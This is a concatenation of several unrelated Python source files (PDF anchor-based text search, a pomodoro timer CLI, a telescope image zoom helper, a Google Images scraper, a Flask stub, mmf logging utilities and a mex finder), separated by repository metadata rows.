.. code-block:: python
from RPA.PDF import PDF
pdf = PDF()
def pdf_invoice_parsing():
pdf.open_pdf("invoice.pdf")
matches = pdf.find_text("Invoice Number")
for match in matches:
print(match)
pdf_invoice_parsing()
.. code-block::
Match(anchor='Invoice Number', direction='right', neighbours=['INV-3337'])
"""
pagenum = int(pagenum)
if closest_neighbours is not None:
closest_neighbours = int(closest_neighbours)
self.logger.info(
"Searching for %s neighbour(s) to the %s of %r on page %d using regular "
"expression: %s",
f"closest {closest_neighbours}"
if closest_neighbours is not None
else "all",
direction,
locator,
pagenum,
regexp,
)
self.set_anchor_to_element(locator, trim=trim, pagenum=pagenum)
if not self.anchor_element:
self.logger.warning("No anchor(s) set for locator: %s", locator)
return []
regexp_compiled = re.compile(regexp) if regexp else None
search_for_candidate = self._get_candidate_search_function(
direction, regexp_compiled, strict
)
candidates_dict: Dict[int, List[Element]] = {}
anchors_map: Dict[int, Element] = {}
for anchor in self._anchors:
candidates_dict[anchor.boxid] = []
anchors_map[anchor.boxid] = anchor
for candidate in self._get_textboxes_on_page(pagenum):
self._log_element(candidate, prefix="Current candidate:")
for anchor in self._anchors:
self._log_element(anchor, prefix="Current anchor:")
# Skip anchor element itself from matching and check if the candidate
# matches the search criteria.
if candidate.boxid != anchor.boxid and search_for_candidate(
candidate, anchor=anchor
):
candidates_dict[anchor.boxid].append(candidate)
matches = []
for anchor_id, candidates in candidates_dict.items():
anchor = anchors_map[anchor_id]
self._sort_candidates_by_anchor(candidates, anchor=anchor)
if closest_neighbours is not None:
# Keep the first N closest neighbours from the entire set of candidates.
candidates[closest_neighbours:] = []
match = Match(
anchor=anchor.text,
direction=direction,
neighbours=[candidate.text for candidate in candidates],
)
matches.append(match)
return matches
@keyword
def set_anchor_to_element(
self, locator: str, trim: bool = True, pagenum: Union[int, str] = 1
) -> bool:
"""Sets main anchor point in the document for further searches.
This is used internally in the library and can work with multiple anchors at
the same time if such are found.
:param locator: Element to set anchor to. This can be prefixed with either
`text:`, `regex:` or `coords:` to find the anchor by text or coordinates.
`text` is assumed if no such prefix is specified. (text search is case
insensitive)
:param trim: Automatically trim leading/trailing whitespace from the text
elements. (switched on by default)
        :param pagenum: Page number on which the search is performed, defaults to 1
            (first page).
:returns: True if at least one anchor was found.
**Examples**
**Robot Framework**
.. code-block:: robotframework
Example Keyword
${success} = Set Anchor To Element Invoice Number
**Python**
.. code-block:: python
from RPA.PDF import PDF
pdf = PDF()
def example_keyword():
success = pdf.set_anchor_to_element("Invoice Number")
"""
pagenum = int(pagenum)
self.logger.info(
"Trying to set anchor on page %d using locator: %r", pagenum, locator
)
self.ctx.convert(trim=trim, pagenum=pagenum)
self._anchors.clear()
self.anchor_element = None
pure_locator = locator
criteria = "text"
parts = locator.split(":", 1)
if len(parts) == 2 and parts[0] in ("coords", "text", "regex"):
criteria = parts[0]
pure_locator = parts[1]
if criteria == "coords":
coords = pure_locator.split(",")
if len(coords) == 2:
left, bottom = coords
top = bottom
right = left
elif len(coords) == 4:
left, bottom, right, top = coords
else:
raise ValueError("Give 2 coordinates for point, or 4 for area")
bbox = (
int(left),
int(bottom),
int(right),
int(top),
)
anchor = TargetObject(bbox=bbox)
self._anchors.append(anchor)
else:
if criteria == "regex":
pure_locator = re.compile(pure_locator)
anchors = self._find_matching_textboxes(pure_locator, pagenum=pagenum)
self._anchors.extend(anchors)
if self._anchors:
self.anchor_element = self._anchors[0]
return True
return False
def _get_textboxes_on_page(self, pagenum: int) -> List[TextBox]:
page = self.active_pdf_document.get_page(pagenum)
return list(page.textboxes.values())
def _find_matching_textboxes(
self, locator: Union[str, Pattern], *, pagenum: int
) -> List[TextBox]:
self.logger.info("Searching for matching text boxes with: %r", locator)
if isinstance(locator, str):
lower_locator = locator.lower()
matches_anchor = (
lambda _anchor: _anchor.text.lower() == lower_locator
) # noqa: E731
else:
matches_anchor = lambda _anchor: locator.match(_anchor.text) # noqa: E731
anchors = []
for anchor in self._get_textboxes_on_page(pagenum):
if matches_anchor(anchor):
anchors.append(anchor)
if anchors:
self.logger.info("Found %d matches with locator %r", len(anchors), locator)
for anchor in anchors:
self._log_element(anchor)
else:
self.logger.warning("Did not find any matches with locator %r", locator)
return anchors
def _check_text_match(self, candidate: TextBox, regexp: Optional[Pattern]) -> bool:
if regexp and regexp.match(candidate.text):
self._log_element(candidate, prefix="Exact match:")
return True
if regexp is None:
self._log_element(candidate, prefix="Potential match:")
return True
return False
def _is_match_on_horizontal(
self,
candidate: TextBox,
*,
direction: str,
regexp: Optional[Pattern],
strict: bool,
anchor: TextBox,
) -> bool:
(left, bottom, right, top) = anchor.bbox
direction_left = direction == "left"
direction_right = direction == "right"
if not any(
[
direction_left and candidate.right <= left,
direction_right and candidate.left >= right,
]
):
            return False # not in the sought direction
non_strict_match = not strict and (
bottom <= candidate.bottom <= top
or bottom <= candidate.top <= top
or candidate.bottom <= bottom <= candidate.top
or candidate.bottom <= top <= candidate.top
)
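        # i.e. the candidate's vertical span overlaps the anchor's [bottom, top] range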
strict_match = strict and (candidate.bottom == bottom or candidate.top == top)
if not any([non_strict_match, strict_match]):
return False # candidate not in boundaries
return self._check_text_match(candidate, regexp)
def _is_match_on_vertical(
self,
candidate: TextBox,
*,
direction: str,
regexp: Optional[Pattern],
strict: bool,
anchor: TextBox,
) -> bool:
(left, bottom, right, top) = anchor.bbox
direction_down = direction in ["bottom", "down"]
direction_up = direction in ["top", "up"]
if not any(
[
direction_down and candidate.top <= bottom,
direction_up and candidate.bottom >= top,
]
):
            return False # not in the sought direction
non_strict_match = not strict and (
left <= candidate.left <= right
or left <= candidate.right <= right
or candidate.left <= left <= candidate.right
or candidate.left <= right <= candidate.right
)
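        # i.e. the candidate's horizontal span overlaps the anchor's [left, right] range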
strict_match = strict and (candidate.left == left or candidate.right == right)
if not any([non_strict_match, strict_match]):
return False # candidate not in boundaries
return self._check_text_match(candidate, regexp)
def _is_match_in_box(self, candidate: TextBox, *, anchor: TextBox) -> bool:
(left, bottom, right, top) = anchor.bbox
return (
left <= candidate.left
and right >= candidate.right
and bottom <= candidate.bottom
and top >= candidate.top
)
@staticmethod
def _sort_candidates_by_anchor(
candidates: List[TextBox], *, anchor: TextBox
) -> None:
get_center = lambda item: ( # noqa: E731
(item.left + item.right) / 2,
(item.bottom + item.top) / 2,
)
anchor_center = get_center(anchor)
def get_distance(candidate):
candidate_center = get_center(candidate)
anchor_to_candidate_distance = math.sqrt(
math.pow((candidate_center[0] - anchor_center[0]), 2)
+ math.pow((candidate_center[1] - anchor_center[1]), 2)
)
return anchor_to_candidate_distance
candidates.sort(key=get_distance)
| 34.052752 | 88 | 0.579309 | 1,648 | 14,847 | 5.099515 | 0.169296 | 0.020228 | 0.007853 | 0.008567 | 0.297953 | 0.240124 | 0.212042 | 0.191218 | 0.178605 | 0.160162 | 0 | 0.004541 | 0.332525 | 14,847 | 435 | 89 | 34.131034 | 0.843491 | 0.253587 | 0 | 0.23913 | 0 | 0.003623 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047101 | false | 0 | 0.036232 | 0 | 0.184783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37637a324f01571ae1690b30b0221a8ae45d7ede | 2,662 | py | Python | ctimer/cli.py | zztin/ctimer | a0721bb9791b23305ee4ff4a2eb30a1f4d8c80cc | [
"Apache-2.0"
] | null | null | null | ctimer/cli.py | zztin/ctimer | a0721bb9791b23305ee4ff4a2eb30a1f4d8c80cc | [
"Apache-2.0"
] | 35 | 2020-06-07T12:40:43.000Z | 2021-06-03T19:56:01.000Z | ctimer/cli.py | zztin/ctimer | a0721bb9791b23305ee4ff4a2eb30a1f4d8c80cc | [
"Apache-2.0"
] | 1 | 2020-06-04T05:31:03.000Z | 2020-06-04T05:31:03.000Z | """Console script for ctimer."""
from ctimer import ctimer
import ctimer.ctimer_db as db
import sys
import argparse
from ctimer.visual import show_stats as ss
import logging
from ctimer import utils
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--debug",
help="Shorten clock intervals for debugging purposes.",
action="store_true",
)
parser.add_argument(
"--stats",
help="Show weekly stats of clock counts this week.",
action="store_true",
)
parser.add_argument(
"--overall", help="Show all clock counts across the years.", action="store_true"
)
parser.add_argument(
"--hide",
help="Display the timer always on top of other windows unless this statement is given",
action="store_true",
)
parser.add_argument(
"--silence",
help="Silence Mode (visual hint instead of audio hint.",
action="store_true",
)
parser.add_argument(
"--db",
type=utils.dir_path,
help="The relative or absolute folder path to store and/or read db. When leave empty: look for previous location, otherwise create new at HOME/.ctimer",
default=None,
)
parser.add_argument("--version", action="version", version="%(prog)s 1.0.0")
parser.add_argument(
"--cus",
action="store_true",
help="give this argument if you want to customize length of clocks/breaks, and aim clock count. You will enter a commandline interface.",
)
args = parser.parse_args()
# cache
db_path = utils.get_cache_filepath(args.db, debug=args.debug)
logging.info(f"{db_path} is where the db stored in.")
if args.debug:
db_file = f"{db_path}/ctimer_debug_2021.db"
db.create_connection(db_file) # create if not exist
else:
db_file = f"{db_path}/ctimer_2021.db"
db.create_connection(db_file) # create if not exist
if args.overall:
events = db.get_yearly_stats(db_file)
ss.plot_calmap(events=events)
elif args.stats:
ss.plot_timetable(path=db_file, outpath="/tmp/")
ss.quick_view_clocks(path=db_file, outpath="/tmp/")
else:
if args.cus:
cus_meta = utils.ask_customized()
ctimer.maintk(
db_file,
hide=args.hide,
debug=args.debug,
silence=args.silence,
meta=cus_meta,
)
else:
ctimer.maintk(
db_file, hide=args.hide, debug=args.debug, silence=args.silence
)
if __name__ == "__main__":
sys.exit(main())
| 31.690476 | 160 | 0.616454 | 344 | 2,662 | 4.610465 | 0.392442 | 0.034048 | 0.08575 | 0.066204 | 0.286255 | 0.261034 | 0.136192 | 0.136192 | 0.136192 | 0.136192 | 0 | 0.005708 | 0.276108 | 2,662 | 83 | 161 | 32.072289 | 0.817333 | 0.027423 | 0 | 0.253333 | 0 | 0.026667 | 0.300271 | 0.020922 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013333 | false | 0 | 0.093333 | 0 | 0.106667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37667d129be38ecf142b51cf7166051726ad367a | 5,256 | py | Python | ZoomImage.py | renshj/High-Cadence-Processing | 5d5a2df741858f6e1466d7c4b008e9245d4b780a | [
"MIT"
] | null | null | null | ZoomImage.py | renshj/High-Cadence-Processing | 5d5a2df741858f6e1466d7c4b008e9245d4b780a | [
"MIT"
] | null | null | null | ZoomImage.py | renshj/High-Cadence-Processing | 5d5a2df741858f6e1466d7c4b008e9245d4b780a | [
"MIT"
] | null | null | null | #This file was created by Wayne Dreyer
#It serves to create a zoomed/cropped image around the detected candidate
import matplotlib.pyplot as plt
from matplotlib.figure import Figure
from PIL import Image
import math
from ZoomObject import ZoomObject
#import DataObject as dataObject
#Takes in the path of the image to zoom, the x/y coordinates of the candidate,
#and a zoom factor, e.g. 2x halves the current dimensions of the image while keeping the candidate as close to the center as possible
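#Example: a 1000x800 image with zoomFactor=2 yields a 500x400 crop; when the candidate
#sits near an edge, the crop stays inside the image and the missing margin is recorded as padding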
def zoomImage(dataObject):
imgList = []
zoomFactor = dataObject.getZoomFactor()
more = dataObject.getCandGt()
for i in range(len(more[0])):
candX, candY = (more[1][i], more[0][i])
result = createZoomed(candX, candY, dataObject.getZoomFactor(), dataObject)
imgList.append(ZoomObject(result[0], result[1], result[2], result[3], result[4], int(result[5]), int(result[6])))
less = dataObject.getCandLt()
for i in range(len(less[0])):
candX, candY = (less[1][i],less[0][i])
result = createZoomed(candX, candY, dataObject.getZoomFactor(), dataObject)
imgList.append(ZoomObject(result[0], result[1], result[2], result[3], result[4], int(result[5]), int(result[6])))
dataObject.setZoomedImages(imgList)
def checkPixels(dataObject):
xCoord = dataObject.getCheckX()
yCoord = dataObject.getCheckY()
zoomfactor = dataObject.getCheckFactor()
img, padTop, padBottom, padLeft, padRight, height, width = createZoomed(xCoord, yCoord, zoomfactor, dataObject)
dataObject.setPixelImage(img)
dataObject.setPadTop(padTop)
dataObject.setPadBottom(padBottom)
dataObject.setPadLeft(padLeft)
dataObject.setPadRight(padRight)
dataObject.setHeight(int(height))
dataObject.setWidth(int(width))
def createZoomed(xCoord, yCoord, zoomFactor, dataObject):
originalImage = dataObject.getImageData()
height = len(originalImage)
width = len(originalImage[0])
newWidth = width/zoomFactor
newHeight = height/zoomFactor
padLeft = 0
padRight = 0
padBottom = 0
padTop = 0
#Calculate new image width as range of original image
    if((width - xCoord > newWidth/2) and (xCoord > newWidth/2)): #there's enough space to have the candidate at the center on the x axis
left = math.floor(xCoord - newWidth/2)
right = math.floor(xCoord + newWidth/2)
elif(not(width - xCoord > newWidth/2)): # if there is not enough space to the right of candidate
right = width
left = math.floor(xCoord - newWidth/2)
padRight = newWidth - (right-left) #the difference between the calculated width and possible width = needed padding
elif(not(xCoord > newWidth/2)): #if there is not enough space to the left of the candidate
left = 0
right = math.floor(xCoord + newWidth/2)
padLeft = newWidth - (right-left) #the difference between the calculated width and possible width = needed padding
#calculate new image height as range of original image height
    if((height - yCoord > newHeight/2) and (yCoord > newHeight/2)): #there's enough space to have the candidate at the center on the y axis
bottom = math.floor(yCoord - newHeight/2)
top = math.floor(yCoord + newHeight/2)
elif(not(height - yCoord > newHeight/2)): # if there is not enough space to the bottom of candidate
top = height
bottom = math.floor(yCoord - newHeight/2)
padBottom = newHeight - (top-bottom) #the difference between the calculated height and possible height = needed padding
elif(not(yCoord > newHeight/2)): #if there is not enough space to the top of the candidate
bottom = 0
top = math.floor(yCoord + newHeight/2)
padTop = newHeight - (top-bottom) #the difference between the calculated height and possible height = needed padding
#the actual cropping
#croppedImage = originalImage.crop((left, bottom, right, top))
#plt.axis(left, right, bottom, top) ##This is how you crop a plot from matplotlib, however this doesn't actually crop the data just what is displayed
croppedImage = originalImage[bottom:top, left:right] # slicing/cropping the image array
return newFigure(croppedImage, 6500, 6700, ((len(croppedImage[0]) + padLeft + padRight)/2), ((len(croppedImage) + padTop + padBottom)/2), xCoord, yCoord), math.floor(padTop), math.floor(padBottom), math.floor(padLeft), math.floor(padRight), newWidth, newHeight
def newFigure(image, cmin, cmax, xLocation, yLocation, xCoord, yCoord):
#Create figure
newFig = plt.figure(figsize=(10,8))
#Set image data into figure
plt.imshow(image, clim=(cmin,cmax))
#Set axes and a colourbar
plt.xlabel("Pixel number")
plt.ylabel("Pixel number")
plt.colorbar()
#Annotate the figure
text=(xCoord,yCoord)
plt.plot(xLocation, yLocation, 'bo')
plt.annotate(text,(xLocation,yLocation), color='black', fontsize='large',fontweight='bold')
return newFig
def showImage(zoomedImage):
plt.imshow(zoomedImage)
def saveImage(filename, zoomedImage):
    plt.imshow(zoomedImage)
plt.savefig(filename)
| 46.105263 | 265 | 0.682839 | 664 | 5,256 | 5.40512 | 0.274096 | 0.030092 | 0.033436 | 0.025634 | 0.355531 | 0.31095 | 0.246308 | 0.246308 | 0.246308 | 0.246308 | 0 | 0.014081 | 0.216324 | 5,256 | 113 | 266 | 46.513274 | 0.857247 | 0.277017 | 0 | 0.15 | 0 | 0 | 0.010932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0 | 0.0625 | 0 | 0.1625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37668c7ab8f618318b3325cde0c87efe87b84f7c | 2,032 | py | Python | service/dataset_builder.py | sumanthgenz/magma | 44a6c8b834fbf683c959ce336c6cdfe1df828980 | [
"MIT"
] | null | null | null | service/dataset_builder.py | sumanthgenz/magma | 44a6c8b834fbf683c959ce336c6cdfe1df828980 | [
"MIT"
] | null | null | null | service/dataset_builder.py | sumanthgenz/magma | 44a6c8b834fbf683c959ce336c6cdfe1df828980 | [
"MIT"
] | null | null | null | import pickle
import glob
import random
from tqdm import tqdm
import os
import collections
import urllib
import urllib.request
from urllib.request import Request, urlopen
import json
import shutil
class DatasetBuilder:
def __init__(self, name, data_type, classes, class_size):
self.name = name
self.data_type = data_type
self.classes = classes
self.class_size = class_size
def download_page(self, url):
headers = {}
        headers['User-Agent'] = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
                                 "(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")
req = urllib.request.Request(url, headers=headers)
return str(urllib.request.urlopen(req).read())
def fetch_google_images(self, query, image_limit=10):
search_url = 'https://www.google.com/search?q={}&tbm=isch'.format('+'.join(urllib.parse.quote(k) for k in query))
raw_html = self.download_page(search_url)
if raw_html is None:
return []
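        # Rough scrape (an assumption about Google's result markup): keep every
        # https URL that appears in a src= attribute of the page.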
images = [img.replace("src=", "").split(';')[0][1:] for img in raw_html.split(" ") if "src=" in img and "https://" in img]
return images[:image_limit]
def get_text_vocab(self, prefix='train', pos='verb', topk=1000):
pass
def save_imgs(self, class_name, images):
dir = f'test_images/{class_name}'
if not os.path.exists(dir):
os.makedirs(dir)
for i, url in enumerate(images):
urllib.request.urlretrieve(url, f'{dir}/{i}.jpg')
def remove_folders(self, query):
pass
def get_data(self):
dataset = {}
for query in self.classes:
dataset[query] = self.fetch_google_images(query, self.class_size)
return dataset
if __name__ == "__main__":
queries = ["strawberry", "the green knight", "tyler the creator", "pizza", "zurich"]
builder = DatasetBuilder("movies", queries, 10)
dataset = builder.get_data()
for k in dataset:
builder.save_imgs(k, dataset[k])
| 30.787879 | 130 | 0.633858 | 275 | 2,032 | 4.530909 | 0.432727 | 0.052167 | 0.020867 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020739 | 0.24065 | 2,032 | 65 | 131 | 31.261538 | 0.786779 | 0 | 0 | 0.039216 | 0 | 0.019608 | 0.140748 | 0.011811 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137255 | false | 0.039216 | 0.215686 | 0 | 0.45098 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37682a93288511c01d92701ef4ba444acd620a71 | 391 | py | Python | app.py | flyme2bluemoon/Flask-Project-Template | 0a2953e4ec77ec577b13655856ab162efb536d4a | [
"MIT"
] | null | null | null | app.py | flyme2bluemoon/Flask-Project-Template | 0a2953e4ec77ec577b13655856ab162efb536d4a | [
"MIT"
] | null | null | null | app.py | flyme2bluemoon/Flask-Project-Template | 0a2953e4ec77ec577b13655856ab162efb536d4a | [
"MIT"
] | null | null | null | from helpers import *
from flask import Flask, redirect, request, render_template, session
from flask_session import Session
app = Flask(__name__)
app.config["TEMPLATES_AUTO_RELOAD"] = True
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
@app.route("/")
def index():
return "Hello"
if __name__ == "__main__":
app.run(host='0.0.0.0') | 23 | 68 | 0.7289 | 54 | 391 | 4.944444 | 0.555556 | 0.101124 | 0.11985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01173 | 0.127877 | 391 | 17 | 69 | 23 | 0.771261 | 0 | 0 | 0 | 0 | 0 | 0.206633 | 0.053571 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0.076923 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3768f3ba1595d85981a62e468f1663abf36a9838 | 7,179 | py | Python | mmf/utils/logger.py | san2597/mmf | c0812e9281c6e679cb7f00af78a5eda267820aab | [
"BSD-3-Clause"
] | 2 | 2021-02-22T12:15:42.000Z | 2021-05-02T15:22:24.000Z | mmf/utils/logger.py | san2597/mmf | c0812e9281c6e679cb7f00af78a5eda267820aab | [
"BSD-3-Clause"
] | 7 | 2021-03-01T21:16:26.000Z | 2022-02-27T07:07:11.000Z | mmf/utils/logger.py | krantirk/MMF | 2e4acaad7ca8eee4319e1205a560eed81733a0be | [
"BSD-3-Clause"
] | 1 | 2022-03-04T14:19:43.000Z | 2022-03-04T14:19:43.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
import collections.abc
import json
import logging
import os
import sys
from typing import Type
from mmf.utils.configuration import get_mmf_env
from mmf.utils.distributed import is_master
from mmf.utils.file_io import PathManager
from mmf.utils.timer import Timer
class Logger:
def __init__(self, config, name=None):
self._logger = None
self._is_master = is_master()
self.timer = Timer()
self.config = config
self.save_dir = get_mmf_env(key="save_dir")
self.log_format = config.training.log_format
self.time_format = "%Y-%m-%dT%H:%M:%S"
self.log_filename = "train_"
self.log_filename += self.timer.get_time_hhmmss(None, format=self.time_format)
self.log_filename += ".log"
self.log_folder = os.path.join(self.save_dir, "logs")
env_log_dir = get_mmf_env(key="log_dir")
if env_log_dir:
self.log_folder = env_log_dir
if not PathManager.exists(self.log_folder):
PathManager.mkdirs(self.log_folder)
self.log_filename = os.path.join(self.log_folder, self.log_filename)
if not self._is_master:
return
if self._is_master:
print("Logging to:", self.log_filename)
logging.captureWarnings(True)
if not name:
name = __name__
self._logger = logging.getLogger(name)
self._file_only_logger = logging.getLogger(name)
self._warnings_logger = logging.getLogger("py.warnings")
# Set level
level = config.training.logger_level
self._logger.setLevel(getattr(logging, level.upper()))
self._file_only_logger.setLevel(getattr(logging, level.upper()))
# Capture stdout to logger
self._stdout_logger = None
if self.config.training.stdout_capture:
self._stdout_logger = StreamToLogger(
logging.getLogger("stdout"), getattr(logging, level.upper())
)
sys.stdout = self._stdout_logger
formatter = logging.Formatter(
"%(asctime)s | %(levelname)s | %(name)s : %(message)s",
datefmt="%Y-%m-%dT%H:%M:%S",
)
# Add handler to file
channel = logging.FileHandler(filename=self.log_filename, mode="a")
channel.setFormatter(formatter)
self.add_handlers(channel)
        # Add handler to train.log. train.log is the full log that is also used
# by slurm/fbl output
channel = logging.FileHandler(
filename=os.path.join(self.save_dir, "train.log"), mode="a"
)
channel.setFormatter(formatter)
self.add_handlers(channel)
# Add handler to stdout. Only when we are not capturing stdout in
# the logger
if not self._stdout_logger:
channel = logging.StreamHandler(sys.stdout)
channel.setFormatter(formatter)
self._logger.addHandler(channel)
self._warnings_logger.addHandler(channel)
should_not_log = self.config.training.should_not_log
self.should_log = not should_not_log
# Single log wrapper map
self._single_log_map = set()
def add_handlers(self, channel: Type[logging.Handler]):
self._logger.addHandler(channel)
self._file_only_logger.addHandler(channel)
self._warnings_logger.addHandler(channel)
if self._stdout_logger:
self._stdout_logger.addHandler(channel)
def write(self, x, level="info", donot_print=False, log_all=False):
if self._logger is None:
return
if log_all is False and not self._is_master:
return
# if it should not log then just print it
if self.should_log:
if hasattr(self._logger, level):
if donot_print:
getattr(self._file_only_logger, level)(str(x))
else:
getattr(self._logger, level)(str(x))
else:
self._logger.error("Unknown log level type: %s" % level)
else:
print(str(x) + "\n")
def log_progress(self, info):
        if not isinstance(info, collections.abc.Mapping):
            self.write(info)
            return
if not self._is_master:
return
if self.log_format == "simple":
output = ", ".join([f"{key}: {value}" for key, value in info.items()])
elif self.log_format == "json":
output = json.dumps(info)
else:
output = str(info)
self.write(output)
def single_write(self, x, level="info", log_all=False):
if self._logger is None:
return
if log_all is False and not self._is_master:
return
if x + "_" + level in self._single_log_map:
return
else:
self.write(x, level)
class StreamToLogger:
"""
Adapted from <https://fburl.com/2qkv0wq2>
Fake file-like stream object that redirects writes to a logger instance.
"""
def __init__(self, logger: Type[logging.Logger], log_level: str = logging.INFO):
self._logger = logger
self.log_level = log_level
def addHandler(self, handler: Type[logging.Handler]):
self._logger.addHandler(handler)
def write(self, buf: str):
for line in buf.rstrip().splitlines():
self._logger.log(self.log_level, line.rstrip())
def flush(self):
pass
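# A minimal usage sketch for StreamToLogger (an illustration, not part of the
# original module): redirect print() output into a named logger. The logger
# name "stdout_demo" and the handler wiring here are assumptions for the demo.
def _demo_stream_to_logger():
    demo_logger = logging.getLogger("stdout_demo")
    demo_logger.addHandler(logging.StreamHandler(sys.stderr))
    demo_logger.setLevel(logging.INFO)
    old_stdout, sys.stdout = sys.stdout, StreamToLogger(demo_logger, logging.INFO)
    try:
        # Captured by StreamToLogger.write() and re-emitted through the logger.
        print("this line goes through the logger")
    finally:
        sys.stdout = old_stdout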
class TensorboardLogger:
def __init__(self, log_folder="./logs", iteration=0):
# This would handle warning of missing tensorboard
from torch.utils.tensorboard import SummaryWriter
self.summary_writer = None
self._is_master = is_master()
self.timer = Timer()
self.log_folder = log_folder
self.time_format = "%Y-%m-%dT%H:%M:%S"
if self._is_master:
current_time = self.timer.get_time_hhmmss(None, format=self.time_format)
tensorboard_folder = os.path.join(
self.log_folder, f"tensorboard_{current_time}"
)
self.summary_writer = SummaryWriter(tensorboard_folder)
def __del__(self):
if getattr(self, "summary_writer", None) is not None:
self.summary_writer.close()
def _should_log_tensorboard(self):
if self.summary_writer is None or not self._is_master:
return False
else:
return True
def add_scalar(self, key, value, iteration):
if not self._should_log_tensorboard():
return
self.summary_writer.add_scalar(key, value, iteration)
def add_scalars(self, scalar_dict, iteration):
if not self._should_log_tensorboard():
return
for key, val in scalar_dict.items():
self.summary_writer.add_scalar(key, val, iteration)
def add_histogram_for_model(self, model, iteration):
if not self._should_log_tensorboard():
return
for name, param in model.named_parameters():
np_param = param.clone().cpu().data.numpy()
self.summary_writer.add_histogram(name, np_param, iteration)
| 32.337838 | 86 | 0.620003 | 892 | 7,179 | 4.764574 | 0.206278 | 0.032941 | 0.025412 | 0.017647 | 0.326118 | 0.273882 | 0.192 | 0.192 | 0.140706 | 0.108706 | 0 | 0.000776 | 0.281794 | 7,179 | 221 | 87 | 32.484163 | 0.823507 | 0.068533 | 0 | 0.265823 | 0 | 0 | 0.042061 | 0.003906 | 0 | 0 | 0 | 0 | 0 | 1 | 0.094937 | false | 0.006329 | 0.06962 | 0 | 0.259494 | 0.025316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
376ac08cf10241073ec03135469cc20f62b04104 | 1,710 | py | Python | mex.py | hagai-helman/mex | d4ee6f79dd0f96346a1b16727e5aa91ab808aed5 | [
"MIT"
] | null | null | null | mex.py | hagai-helman/mex | d4ee6f79dd0f96346a1b16727e5aa91ab808aed5 | [
"MIT"
] | null | null | null | mex.py | hagai-helman/mex | d4ee6f79dd0f96346a1b16727e5aa91ab808aed5 | [
"MIT"
] | null | null | null | class MexFinder:
"""This class collects non-negative integers, and finds the minimal
non-negative integer that was not added to it.
"""
def __init__(self):
# We maintain a dict, representing a set, with the following
# invariants:
# (a) Its keys are the elements of the set (and -1, see below);
# (b) For any maximal sequence of consecutive elements, the first
# one is mapped to last one, and vice-versa.
#
# The key (-1) is mapped to 0, so when an element is added, we
# don't need to give special treatment to the special case when
# this element is 0.
self._d = {-1: 0}
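        # Worked example: after add(0), add(1), add(3) the dict becomes
        # {-1: 0, 0: 1, 1: 0, 3: 3}, so mex() returns self._d[0] + 1 == 2.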
def add(self, n):
"""Adds a number to the collection.
`n` is assumed to be a non-negative integer.
"""
if n in self._d:
return
# We make sure `n` is in `self._d`.
self._d[n] = n
# We find the first element (`left`) and the last element (`right`) of
# the maximal sequence of consecutive elements that contains `n`.
left = self._d.get(n - 1, n)
right = self._d.get(n + 1, n)
# We make sure `left` and `right` are mapped to each other.
self._d[left] = right
self._d[right] = left
def mex(self):
"""Returns the minimal non-negative integer excluded from the set."""
if 0 not in self._d:
return 0
else:
return self._d[0] + 1
def mex(values):
"""Finds the minimal non-negative integer excluded from a given iterable
of non-negative integers."""
finder = MexFinder()
for value in values:
finder.add(value)
return finder.mex()
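# A small self-check of the module (an illustration; guarded so that importing
# the module stays side-effect free):
if __name__ == "__main__":
    assert mex([]) == 0
    assert mex([0, 1, 3]) == 2
    finder = MexFinder()
    for n in (1, 0, 2, 5):
        finder.add(n)
    assert finder.mex() == 3
    print("mex self-check passed")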
